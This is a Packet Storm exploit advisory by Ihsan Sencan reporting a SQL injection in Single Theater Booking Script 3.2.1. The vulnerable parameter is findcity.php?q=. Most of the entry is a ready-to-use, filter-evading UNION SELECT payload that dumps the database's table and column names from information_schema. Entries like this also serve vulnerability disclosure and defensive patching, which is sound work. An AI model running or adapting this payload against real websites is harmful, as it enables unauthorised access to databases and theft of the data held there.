Single Theater Booking Script 3.2.1 SQL Injection

2017-12-12T00:00:00
ID PACKETSTORM:145344
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-12-12T00:00:00

Description

                                        
                                            `# # # # #   
# Exploit Title: Single Theater Booking Script 3.2.1 - SQL Injection  
# Dork: N/A  
# Date: 09.12.2017  
# Vendor Homepage: https://www.phpscriptsmall.com/  
# Software Link: https://www.phpscriptsmall.com/product/single-theater-booking-script/  
# Version: 3.2.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands....  
#   
# Proof of Concept:   
#   
# 1)  
# http://localhost/[PATH]/findcity.php?q=[SQL]  
#   
# s'++/*!02222UNION*/+/*!02222SELECT*/+1,2,3,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),5--+-  
#   
#   
# # # # #  
  
`